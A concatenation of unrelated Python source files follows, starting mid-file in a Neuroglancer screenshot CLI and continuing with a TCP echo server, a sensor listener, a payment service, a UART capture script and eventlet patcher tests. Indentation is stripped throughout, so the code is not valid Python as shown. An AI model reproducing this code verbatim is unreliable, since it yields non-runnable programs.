ap.add_argument('--concurrent-downloads', type=int, default=32, help='Concurrent downloads')
ap.add_argument('--layout', type=str, help='Override layout setting in state.')
ap.add_argument('--cross-section-background-color',
type=str,
help='Background color for cross sections.')
ap.add_argument('--scale-bar-scale', type=float, help='Scale factor for scale bar', default=1)
def apply_state_modifications(state: neuroglancer.ViewerState, args: argparse.Namespace):
state.selected_layer.visible = False
state.statistics.visible = False
if args.layout is not None:
state.layout = args.layout
if args.show_axis_lines is not None:
state.show_axis_lines = args.show_axis_lines
if args.show_default_annotations is not None:
state.show_default_annotations = args.show_default_annotations
if args.projection_scale_multiplier is not None:
state.projection_scale *= args.projection_scale_multiplier
if args.cross_section_background_color is not None:
state.cross_section_background_color = args.cross_section_background_color
state.gpu_memory_limit = args.gpu_memory_limit
state.system_memory_limit = args.system_memory_limit
state.concurrent_downloads = args.concurrent_downloads
def define_viewer_args(ap: argparse.ArgumentParser):
ap.add_argument('--browser', choices=['chrome', 'firefox'], default='chrome')
ap.add_argument('--no-webdriver',
action='store_true',
help='Do not open browser automatically via webdriver.')
ap.add_argument('--no-headless',
dest='headless',
action='store_false',
help='Use non-headless webdriver.')
ap.add_argument('--docker-chromedriver',
action='store_true',
help='Run Chromedriver with options suitable for running inside docker')
ap.add_argument('--debug-chromedriver',
action='store_true',
help='Enable debug logging in Chromedriver')
ap.add_argument('--jobs',
'-j',
type=int,
default=1,
help='Number of browsers to use concurrently. '
'This may improve performance at the cost of greater memory usage. '
'On a 64GiB 16 hyperthread machine, --jobs=6 works well.')
def define_size_args(ap: argparse.ArgumentParser):
ap.add_argument('--width', type=int, default=3840, help='Width in pixels of image.')
ap.add_argument('--height', type=int, default=2160, help='Height in pixels of image.')
def define_tile_args(ap: argparse.ArgumentParser):
ap.add_argument(
'--tile-width',
type=int,
default=4096,
help=
'Width in pixels of single tile. If total width is larger, the screenshot will be captured as multiple tiles.'
)
ap.add_argument(
'--tile-height',
type=int,
default=4096,
help=
'Height in pixels of single tile. If total height is larger, the screenshot will be captured as multiple tiles.'
)
ap.add_argument('--segment-shard-size',
type=int,
help='Maximum number of segments to render simultaneously. '
'If the number of selected segments exceeds this number, '
'multiple passes will be used (transparency not supported).')
ap.add_argument(
'--sort-segments-by-reversed-bits',
action='store_true',
help=
'When --segment-shard-size is also specified, normally segment ids are ordered numerically before being partitioned into shards. If segment ids are spatially correlated, then this can lead to slower and more memory-intensive rendering. If --sort-segments-by-reversed-bits is specified, segment ids are instead ordered by their bit reversed values, which may avoid the spatial correlation.'
)
def define_capture_args(ap: argparse.ArgumentParser):
ap.add_argument('--prefetch', type=int, default=1, help='Number of states to prefetch.')
ap.add_argument(
'--refresh-browser-timeout',
type=int,
default=60,
help=
'Number of seconds without receiving statistics while capturing a screenshot before browser is considered unresponsive.'
)
@contextlib.contextmanager
def get_viewers(args: argparse.Namespace):
if args.no_webdriver:
viewers = [neuroglancer.Viewer() for _ in range(args.jobs)]
print('Open the following URLs to begin rendering')
for viewer in viewers:
print(viewer)
def refresh_browser_callback():
print('Browser unresponsive, consider reloading')
yield [(viewer, refresh_browser_callback) for viewer in viewers]
else:
def _make_webdriver():
webdriver = neuroglancer.webdriver.Webdriver(
headless=args.headless,
docker=args.docker_chromedriver,
debug=args.debug_chromedriver,
browser=args.browser,
)
def refresh_browser_callback():
print('Browser unresponsive, reloading')
webdriver.reload_browser()
return webdriver, refresh_browser_callback
webdrivers = [_make_webdriver() for _ in range(args.jobs)]
try:
yield [(webdriver.viewer, refresh_browser_callback)
for webdriver, refresh_browser_callback in webdrivers]
finally:
for webdriver, _ in webdrivers:
try:
webdriver.__exit__()
except:
pass
def run(args: argparse.Namespace):
neuroglancer.cli.handle_server_arguments(args)
state = args.state
apply_state_modifications(state, args)
with get_viewers(args) as viewers:
capture_image(viewers, args, state)
def main(args=None):
ap = argparse.ArgumentParser()
neuroglancer.cli.add_server_arguments(ap)
neuroglancer.cli.add_state_arguments(ap, required=True)
ap.add_argument('output', help='Output path of screenshot file in PNG format.')
ap.add_argument('--output-shard', type=int, help='Output shard to write.')
output_shard_group = ap.add_mutually_exclusive_group(required=False)
output_shard_group.add_argument('--num-output-shards',
type=int,
help='Number of output shards.')
output_shard_group.add_argument('--tiles-per-output-shard',
type=int,
help='Number of tiles per output shard.')
ap.add_argument('--checkpoint-interval',
type=float,
default=60,
help='Interval in seconds at which to save checkpoints.')
define_state_modification_args(ap)
define_viewer_args(ap)
define_size_args(ap)
define_tile_args(ap)
define_capture_args(ap)
run(ap.parse_args(args))
if __name__ == '__main__':
main()
|
mult-tcpServer.py
|
#!/usr/bin/env python
import socket
import multiprocessing
#create a function that handles the data received from the client
def clientHandler(client_socket,client_ip, client_port):
data ="test"
while data:
data = client_socket.recv(1024)
print "Received %s from Client %s:%d" %(data, client_ip, client_port)
client_socket.send(data)
client_socket.close()
def main():
processing_list = []
bind_ip="0.0.0.0"
bind_port=9999
tcpServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpServer.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
tcpServer.bind((bind_ip, bind_port))
tcpServer.listen(5)
#server forever
while True:
client_socket, (client_ip, client_port) = tcpServer.accept()
process = multiprocessing.Process(target=clientHandler, args=(client_socket, client_ip, client_port))
process.start()
processing_list.append(process)
if __name__ == "__main__":
main()
|
listener.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Vargas Hector <vargash1>
# @Date: Sunday, April 10th 2016, 11:18:37 pm
# @Email: vargash1@wit.edu
# @Last modified by: vargash1
# @Last modified time: Tuesday, April 12th 2016, 5:06:34 am
import multiprocessing
from vraspi import ultrasonic, motion, light, temp, noise, log
class SensorListener:
def __init__(self, logger, queue):
self.msgqueue = queue
self.ultrasonicProcess = None
self.motionProcess = None
self.lightProcess = None
self.tempProcess = None
self.soundProcess = None
self.logger = logger
def initialize(self):
ultratest = ultrasonic.UltraSonicSensor(self.msgqueue, self.logger)
motiontest = motion.MotionSensor(self.msgqueue, self.logger)
lighttest = light.LightSensor(self.msgqueue, self.logger)
self.tempProcess = temp.TempReader(self.msgqueue, self.logger)
soundtest = noise.NoiseSensor(self.msgqueue, self.logger)
self.motionProcess = multiprocessing.Process(target=motiontest.detect_Motion)
self.ultrasonicProcess = multiprocessing.Process(target=ultratest.detect_dist)
self.lightProcess = multiprocessing.Process(target=lighttest.detect_light)
self.soundProcess = multiprocessing.Process(target=soundtest.detect_sound)
def runProcesses(self):
self.ultrasonicProcess.start()
self.motionProcess.start()
self.lightProcess.start()
self.soundProcess.start()
def getQueueMessage(self):
return self.msgqueue.get()
def execute(self):
self.initialize()
self.runProcesses()
"""
No need to constantly read tempratures!
"""
def getTempReading(self):
return self.tempProcess.get_temp()
def main():
lels = log.VRaspLog()
lels.initLogger()
listener = SensorListener(lels)
listener.execute()
while listener.getQueueMessage() is not None:
msg = listener.getQueueMessage()
if msg is not None:
print msg
else:
print "No queue messages!"
if __name__ == "__main__":
main()
|
payment_service.py
|
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service class to control all the operations related to Payment."""
from threading import Thread
from typing import Any, Dict, Tuple
from flask import copy_current_request_context, current_app
from pay_api.exceptions import BusinessException
from pay_api.factory.payment_system_factory import PaymentSystemFactory
from pay_api.utils.constants import EDIT_ROLE
from pay_api.utils.enums import PaymentStatus, InvoiceStatus, LineItemStatus, InvoiceReferenceStatus, \
PaymentMethod
from pay_api.utils.errors import Error
from pay_api.utils.util import get_str_by_path
from .base_payment_system import PaymentSystemService
from .fee_schedule import FeeSchedule
from .invoice import Invoice
from .invoice_reference import InvoiceReference
from .payment import Payment
from .payment_account import PaymentAccount
from .payment_line_item import PaymentLineItem
from .payment_transaction import PaymentTransaction
class PaymentService: # pylint: disable=too-few-public-methods
"""Service to manage Payment related operations."""
@classmethod
def create_invoice(cls, payment_request: Tuple[Dict[str, Any]], authorization: Tuple[Dict[str, Any]]) -> Dict:
# pylint: disable=too-many-locals, too-many-statements
"""Create payment related records.
Does the following;
1. Calculate the fees based on the filing types received.
2. Check if the payment account exists,
2.1 If yes, use the one from database.
2.2 Else create one in payment system and update database.
3. Create payment record in database and flush.
4. Create invoice record in database and flush.
5. Create payment line items in database and flush.
6. Create invoice in payment system;
6.1 If successful update the invoice table with references from payment system.
6.1.1 If failed adjust the invoice to zero and roll back the transaction.
6.2 If fails rollback the transaction
"""
current_app.logger.debug('<create_invoice', payment_request)
business_info = payment_request.get('businessInfo')
filing_info = payment_request.get('filingInfo')
account_info = payment_request.get('accountInfo', None)
filing_id = filing_info.get('filingIdentifier', None)
folio_number = filing_info.get('folioNumber', get_str_by_path(authorization, 'business/folioNumber'))
corp_type = business_info.get('corpType', None)
payment_account = cls._find_payment_account(authorization)
payment_method = _get_payment_method(payment_request, payment_account)
bcol_account = cls._get_bcol_account(account_info, payment_account)
# Calculate the fees
current_app.logger.debug('Calculate the fees')
fees = _calculate_fees(corp_type, filing_info)
# Create payment system instance from factory
current_app.logger.debug('Creating PaymentSystemService impl')
pay_service: PaymentSystemService = PaymentSystemFactory.create(
payment_method=payment_method,
corp_type=corp_type,
fees=sum(fee.total for fee in fees),
account_info=account_info,
payment_account=payment_account
)
pay_system_invoice: Dict[str, any] = None
invoice: Invoice = None
try:
current_app.logger.debug('Creating Invoice record')
invoice = Invoice()
invoice.bcol_account = bcol_account
invoice.payment_account_id = payment_account.id
invoice.cfs_account_id = payment_account.cfs_account_id
invoice.invoice_status_code = pay_service.get_default_invoice_status()
# TODO Change based on decision, whether to apply service fees for each line or not.
# For now add up the service fee on each fee schedule
invoice.service_fees = sum(fee.service_fees for fee in fees) if fees else 0
invoice.total = sum(fee.total for fee in fees) if fees else 0
invoice.paid = 0
invoice.refund = 0
invoice.routing_slip = get_str_by_path(account_info, 'routingSlip')
invoice.filing_id = filing_id
invoice.dat_number = get_str_by_path(account_info, 'datNumber')
invoice.folio_number = folio_number
invoice.business_identifier = business_info.get('businessIdentifier')
invoice.payment_method_code = pay_service.get_payment_method_code()
invoice.corp_type_code = corp_type
invoice = invoice.flush()
line_items = []
for fee in fees:
current_app.logger.debug('Creating line items')
line_items.append(PaymentLineItem.create(invoice.id, fee))
current_app.logger.debug('Handing off to payment system to create invoice')
invoice_reference = pay_service.create_invoice(payment_account, line_items, invoice,
corp_type_code=invoice.corp_type_code)
current_app.logger.debug('Updating invoice record')
invoice.commit()
pay_service.complete_post_invoice(invoice, invoice_reference)
invoice = Invoice.find_by_id(invoice.id, skip_auth_check=True)
except Exception as e: # NOQA pylint: disable=broad-except
current_app.logger.error('Rolling back as error occured!')
current_app.logger.error(e)
if invoice:
invoice.rollback()
if pay_system_invoice:
pay_service.cancel_invoice(
payment_account,
pay_system_invoice.get('invoice_number'),
)
raise
current_app.logger.debug('>create_invoice')
return invoice.asdict(include_dynamic_fields=True)
@classmethod
def _find_payment_account(cls, authorization):
# find payment account
payment_account: PaymentAccount = PaymentAccount.find_account(authorization)
# If there is no payment_account it must be a request with no account (NR, Staff payment etc.)
# and invoked using a service account or a staff token
if not payment_account:
payment_method = get_str_by_path(authorization,
'account/paymentInfo/methodOfPayment') or _get_default_payment()
payment_account = PaymentAccount.create(
dict(
accountId=get_str_by_path(authorization, 'account/id'),
paymentInfo=dict(
methodOfPayment=payment_method,
billable=True)
)
)
return payment_account
@classmethod
def _get_bcol_account(cls, account_info, payment_account: PaymentAccount):
if account_info and account_info.get('bcolAccountNumber', None):
bcol_account = account_info.get('bcolAccountNumber')
else:
bcol_account = payment_account.bcol_account
return bcol_account
@classmethod
def update_invoice(cls, invoice_id: int, payment_request: Tuple[Dict[str, Any]], is_apply_credit: bool = False):
"""Update invoice related records."""
current_app.logger.debug('<update_invoice')
invoice: Invoice = Invoice.find_by_id(invoice_id, skip_auth_check=False)
# If the call is to apply credit, apply credit and release records.
if is_apply_credit:
credit_balance: float = 0
payment_account: PaymentAccount = PaymentAccount.find_by_id(invoice.payment_account_id)
invoice_balance = invoice.total - (invoice.paid or 0)
if (payment_account.credit or 0) >= invoice_balance:
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(
invoice.payment_method_code)
# Only release records, as the actual status change should happen during reconciliation.
pay_service.apply_credit(invoice)
credit_balance = payment_account.credit - invoice_balance
invoice.paid = invoice.total
invoice.save()
elif (payment_account.credit or 0) <= invoice_balance:
invoice.paid = (invoice.paid or 0) + payment_account.credit
invoice.save()
payment_account.credit = credit_balance
payment_account.save()
else:
payment_method = get_str_by_path(payment_request, 'paymentInfo/methodOfPayment')
is_not_currently_on_ob = invoice.payment_method_code != PaymentMethod.ONLINE_BANKING.value
is_not_changing_to_cc = payment_method not in (PaymentMethod.CC.value, PaymentMethod.DIRECT_PAY.value)
# can patch only if the current payment method is OB
if is_not_currently_on_ob or is_not_changing_to_cc:
raise BusinessException(Error.INVALID_REQUEST)
# check if it has any invoice references already created
# if there is any invoice ref , send them to the invoiced credit card flow
invoice_reference = InvoiceReference.find_active_reference_by_invoice_id(invoice.id)
if invoice_reference:
invoice.payment_method_code = PaymentMethod.CC.value
else:
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(
PaymentMethod.DIRECT_PAY.value)
payment_account = PaymentAccount.find_by_id(invoice.payment_account_id)
pay_service.create_invoice(payment_account, invoice.payment_line_items, invoice,
corp_type_code=invoice.corp_type_code)
invoice.payment_method_code = PaymentMethod.DIRECT_PAY.value
invoice.save()
current_app.logger.debug('>update_invoice')
return invoice.asdict()
@classmethod
def delete_invoice(cls, invoice_id: int): # pylint: disable=too-many-locals,too-many-statements
"""Delete invoice related records.
Does the following;
1. Check if payment is eligible to be deleted.
2. Mark the payment and invoices records as deleted.
3. Publish message to queue
"""
current_app.logger.debug('<delete_invoice')
# update transaction function will update the status from PayBC
_update_active_transactions(invoice_id)
invoice: Invoice = Invoice.find_by_id(invoice_id, skip_auth_check=True)
# Create the payment system implementation
pay_service: PaymentSystemService = PaymentSystemFactory.create_from_payment_method(invoice.payment_method_code)
# set payment status as deleted
payment = Payment.find_payment_for_invoice(invoice_id)
_check_if_invoice_can_be_deleted(invoice, payment)
if payment:
payment.payment_status_code = PaymentStatus.DELETED.value
payment.flush()
# Cancel invoice
invoice_reference = InvoiceReference.find_active_reference_by_invoice_id(invoice.id)
payment_account = PaymentAccount.find_by_id(invoice.payment_account_id)
if invoice_reference:
pay_service.cancel_invoice(payment_account=payment_account, inv_number=invoice_reference.invoice_number)
invoice.invoice_status_code = InvoiceStatus.DELETED.value
for line in invoice.payment_line_items:
line.line_item_status_code = LineItemStatus.CANCELLED.value
invoice_reference.status_code = InvoiceReferenceStatus.CANCELLED.value
invoice_reference.flush()
invoice.save()
current_app.logger.debug('>delete_invoice')
@classmethod
def accept_delete(cls, invoice_id: int): # pylint: disable=too-many-locals,too-many-statements
"""Mark payment related records to be deleted."""
current_app.logger.debug('<accept_delete')
invoice: Invoice = Invoice.find_by_id(invoice_id, one_of_roles=[EDIT_ROLE])
_check_if_invoice_can_be_deleted(invoice)
invoice.payment_status_code = InvoiceStatus.DELETE_ACCEPTED.value
invoice.save()
@copy_current_request_context
def run_delete():
"""Call delete payment."""
PaymentService.delete_invoice(invoice_id)
current_app.logger.debug('Starting thread to delete invoice.')
thread = Thread(target=run_delete)
thread.start()
current_app.logger.debug('>accept_delete')
def _calculate_fees(corp_type, filing_info):
"""Calculate and return the fees based on the filing type codes."""
fees = []
service_fee_applied: bool = False
for filing_type_info in filing_info.get('filingTypes'):
current_app.logger.debug('Getting fees for {} '.format(filing_type_info.get('filingTypeCode')))
fee: FeeSchedule = FeeSchedule.find_by_corp_type_and_filing_type(
corp_type=corp_type,
filing_type_code=filing_type_info.get('filingTypeCode', None),
valid_date=filing_info.get('date', None),
jurisdiction=None,
is_priority=filing_type_info.get('priority'),
is_future_effective=filing_type_info.get('futureEffective'),
waive_fees=filing_type_info.get('waiveFees'),
quantity=filing_type_info.get('quantity')
)
# If service fee is already applied, do not charge again.
if service_fee_applied:
fee.service_fees = 0
elif fee.service_fees > 0:
service_fee_applied = True
if filing_type_info.get('filingDescription'):
fee.description = filing_type_info.get('filingDescription')
fees.append(fee)
return fees
def _update_active_transactions(invoice_id: int):
# update active transactions
current_app.logger.debug('<_update_active_transactions')
transaction: PaymentTransaction = PaymentTransaction.find_active_by_invoice_id(invoice_id)
if transaction:
# check existing payment status in PayBC;
PaymentTransaction.update_transaction(transaction.id, pay_response_url=None)
def _check_if_invoice_can_be_deleted(invoice: Invoice, payment: Payment = None):
if invoice.invoice_status_code in (InvoiceStatus.PAID.value, InvoiceStatus.DELETED.value,
InvoiceStatus.APPROVED.value):
raise BusinessException(Error.COMPLETED_PAYMENT)
if payment and payment.payment_status_code in (PaymentStatus.COMPLETED.value, PaymentStatus.DELETED.value):
raise BusinessException(Error.COMPLETED_PAYMENT)
def _get_payment_method(payment_request: Dict, payment_account: PaymentAccount):
# If no methodOfPayment is provided, use the one against the payment account table.
payment_method = get_str_by_path(payment_request, 'paymentInfo/methodOfPayment')
if not payment_method:
payment_method = payment_account.payment_method
if not payment_method:
payment_method = _get_default_payment()
return payment_method
def _get_default_payment() -> str:
return PaymentMethod.DIRECT_PAY.value
|
uart_file_capture.py
|
## Script para capturar archivos o datos entrantes por puerto serial
from functions.serial_ports import *
import serial
import threading
import time
import sys
import os
import hashlib
## Parameters
# BAUDRATE = 1041666
BAUDRATE = 115200
DATASIZE = 26240 # bytes
PORT = 'COM30'
in_buf = bytes('', 'utf-8') # buffer de entrada de datos, el limite en windows
# por driver es 4096 y necesitamos expandir esto
## Thread control
t = "dummy"
run = True
# worker de thread
def worker(dummy, ser):
global in_buf
global run
reporte_tiempo = True
timer_iniciado = False
print("worker starting...")
while(run):
in_buf += ser.read(ser.inWaiting())
lenbuf = len(in_buf)
if (lenbuf > 0 and timer_iniciado == False):
t_init = time.clock()
timer_iniciado = True
print("tic...")
if (lenbuf == DATASIZE and reporte_tiempo == True):
t_end = time.clock()
print("tiempo envio:", t_end - t_init)
reporte_tiempo = False
print("worker stop...")
# funcion principal
def main():
global in_buf
global t
ser = serial.Serial(PORT, BAUDRATE, timeout = 1)
ser.reset_input_buffer() # se limpia buffer por seguridad
print("** Buffer Cleaned **")
# Thread para ir sacando elementos del buffer
t = threading.Thread(target=worker, args = (0, ser))
t.start()
# Loop para revisar cantidad de elementos en buffer de userspace
n_datos_old = 0
timeout_count = 0 # Para llevar la cuenta de segundos sin recibir datos
while(True):
time.sleep(1)
n_datos = len(in_buf)
if (n_datos != n_datos_old):
print(n_datos, " en el buffer", end = '\r')
# rutina que revisa si se terminó la recepción de datos, se genera un
# se genera un timeout counter para salir del script
elif (n_datos == n_datos_old) & (n_datos > 0):
timeout_count += 1
n_datos_old = n_datos
if(timeout_count == 3):
exit_script()
def exit_script():
global run
global t
print("\nInterrupted")
run = False
t.join()
print("****************************")
print("Data MD5 Hash")
hash_object = hashlib.md5(in_buf)
print(hash_object.hexdigest())
print("****************************")
file = open("frame_received.jpg", "wb")
file.write(in_buf)
file.close()
try:
sys.exit(0)
except SystemExit:
os._exit(0)
# main()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit_script()
|
patcher_test.py
|
import os
import shutil
import sys
import tempfile
import six
import tests
base_module_contents = """
import socket
import urllib
print("base {0} {1}".format(socket, urllib))
"""
patching_module_contents = """
from eventlet.green import socket
from eventlet.green import urllib
from eventlet import patcher
print('patcher {0} {1}'.format(socket, urllib))
patcher.inject('base', globals(), ('socket', socket), ('urllib', urllib))
del patcher
"""
import_module_contents = """
import patching
import socket
print("importing {0} {1} {2} {3}".format(patching, socket, patching.socket, patching.urllib))
"""
class ProcessBase(tests.LimitedTestCase):
TEST_TIMEOUT = 3 # starting processes is time-consuming
def setUp(self):
super(ProcessBase, self).setUp()
self._saved_syspath = sys.path
self.tempdir = tempfile.mkdtemp('_patcher_test')
def tearDown(self):
super(ProcessBase, self).tearDown()
sys.path = self._saved_syspath
shutil.rmtree(self.tempdir)
def write_to_tempfile(self, name, contents):
filename = os.path.join(self.tempdir, name)
if not filename.endswith('.py'):
filename = filename + '.py'
with open(filename, "w") as fd:
fd.write(contents)
def launch_subprocess(self, filename):
path = os.path.join(self.tempdir, filename)
output = tests.run_python(path)
if six.PY3:
output = output.decode('utf-8')
separator = '\n'
else:
separator = b'\n'
lines = output.split(separator)
return output, lines
def run_script(self, contents, modname=None):
if modname is None:
modname = "testmod"
self.write_to_tempfile(modname, contents)
return self.launch_subprocess(modname)
class ImportPatched(ProcessBase):
def test_patch_a_module(self):
self.write_to_tempfile("base", base_module_contents)
self.write_to_tempfile("patching", patching_module_contents)
self.write_to_tempfile("importing", import_module_contents)
output, lines = self.launch_subprocess('importing.py')
assert lines[0].startswith('patcher'), repr(output)
assert lines[1].startswith('base'), repr(output)
assert lines[2].startswith('importing'), repr(output)
assert 'eventlet.green.socket' in lines[1], repr(output)
assert 'eventlet.green.urllib' in lines[1], repr(output)
assert 'eventlet.green.socket' in lines[2], repr(output)
assert 'eventlet.green.urllib' in lines[2], repr(output)
assert 'eventlet.green.httplib' not in lines[2], repr(output)
def test_import_patched_defaults():
tests.run_isolated('patcher_import_patched_defaults.py')
def test_import_patched_handles_sub_modules():
tests.run_isolated('test_sub_module_in_import_patched/test.py')
class MonkeyPatch(ProcessBase):
def test_patched_modules(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import socket
try:
import urllib.request as urllib
except ImportError:
import urllib
print("newmod {0} {1}".format(socket.socket, urllib.socket.socket))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[0].startswith('newmod'), repr(output)
self.assertEqual(lines[0].count('GreenSocket'), 2, repr(output))
def test_early_patching(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import eventlet
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_late_patching(self):
new_mod = """
import eventlet
eventlet.sleep(0.01)
from eventlet import patcher
patcher.monkey_patch()
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_typeerror(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch(finagle=True)
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[-2].startswith('TypeError'), repr(output)
assert 'finagle' in lines[-2], repr(output)
def assert_boolean_logic(self, call, expected, not_expected=''):
expected_list = ", ".join(['"%s"' % x for x in expected.split(',') if len(x)])
not_expected_list = ", ".join(['"%s"' % x for x in not_expected.split(',') if len(x)])
new_mod = """
from eventlet import patcher
%s
for mod in [%s]:
assert patcher.is_monkey_patched(mod), mod
for mod in [%s]:
assert not patcher.is_monkey_patched(mod), mod
print("already_patched {0}".format(",".join(sorted(patcher.already_patched.keys()))))
""" % (call, expected_list, not_expected_list)
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
ap = 'already_patched'
assert lines[0].startswith(ap), repr(output)
patched_modules = lines[0][len(ap):].strip()
# psycopg might or might not be patched based on installed modules
patched_modules = patched_modules.replace("psycopg,", "")
# ditto for MySQLdb
patched_modules = patched_modules.replace("MySQLdb,", "")
self.assertEqual(
patched_modules, expected,
"Logic:%s\nExpected: %s != %s" % (call, expected, patched_modules))
def test_boolean(self):
self.assert_boolean_logic("patcher.monkey_patch()",
'os,select,socket,subprocess,thread,time')
def test_boolean_all(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_single(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True, socket=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_negative(self):
self.assert_boolean_logic(
"patcher.monkey_patch(all=False, socket=False, select=True)",
'select')
def test_boolean_single(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True)",
'socket')
def test_boolean_double(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True, select=True)",
'select,socket')
def test_boolean_negative(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False)",
'os,select,subprocess,thread,time')
def test_boolean_negative2(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, time=False)",
'os,select,subprocess,thread')
def test_conflicting_specifications(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, select=True)",
'select')
test_monkey_patch_threading = """
def test_monkey_patch_threading():
tickcount = [0]
def tick():
import six
for i in six.moves.range(1000):
tickcount[0] += 1
eventlet.sleep()
def do_sleep():
tpool.execute(time.sleep, 0.5)
eventlet.spawn(tick)
w1 = eventlet.spawn(do_sleep)
w1.wait()
print(tickcount[0])
assert tickcount[0] > 900
tpool.killall()
"""
class Tpool(ProcessBase):
TEST_TIMEOUT = 3
@tests.skip_with_pyevent
def test_simple(self):
new_mod = """
import eventlet
from eventlet import patcher
patcher.monkey_patch()
from eventlet import tpool
print("newmod {0}".format(tpool.execute(len, "hi")))
print("newmod {0}".format(tpool.execute(len, "hi2")))
tpool.killall()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, output)
assert lines[0].startswith('newmod'), repr(output)
assert '2' in lines[0], repr(output)
assert '3' in lines[1], repr(output)
@tests.skip_with_pyevent
def test_unpatched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=False)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, lines)
@tests.skip_with_pyevent
def test_patched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=True)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
def test_subprocess_after_monkey_patch():
code = '''\
import sys
import eventlet
eventlet.monkey_patch()
from eventlet.green import subprocess
subprocess.Popen([sys.executable, '-c', ''], stdin=subprocess.PIPE).wait()
print('pass')
'''
output = tests.run_python(
path=None,
args=['-c', code],
)
assert output.rstrip() == b'pass'
class Threading(ProcessBase):
def test_orig_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import patcher
import threading
_threading = patcher.original('threading')
def test():
print(repr(threading.currentThread()))
t = _threading.Thread(target=test)
t.start()
t.join()
print(len(threading._active))
print(len(_threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 4, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
assert lines[1] == '1', lines
assert lines[2] == '1', lines
def test_tpool(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import tpool
import threading
def test():
print(repr(threading.currentThread()))
tpool.execute(test)
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenlet(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import event
import threading
evt = event.Event()
def test():
print(repr(threading.currentThread()))
evt.send()
eventlet.spawn_n(test)
evt.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_MainThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenthread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
import threading
def test():
print(repr(threading.currentThread()))
t = eventlet.spawn(test)
t.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_keyerror(self):
new_mod = """import eventlet
eventlet.monkey_patch()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 1, "\n".join(lines))
class Os(ProcessBase):
def test_waitpid(self):
new_mod = """import subprocess
import eventlet
eventlet.monkey_patch(all=False, os=True)
process = subprocess.Popen("sleep 0.1 && false", shell=True)
print(process.wait())"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
self.assertEqual('1', lines[0], repr(output))
class GreenThreadWrapper(ProcessBase):
prologue = """import eventlet
eventlet.monkey_patch()
import threading
def test():
t = threading.currentThread()
"""
epilogue = """
t = eventlet.spawn(test)
t.wait()
"""
def test_join(self):
self.write_to_tempfile("newmod", self.prologue + """
def test2():
global t2
t2 = threading.currentThread()
eventlet.spawn(test2)
""" + self.epilogue + """
print(repr(t2))
t2.join()
""")
output, lines = self.launch_subprocess('newmod.py')
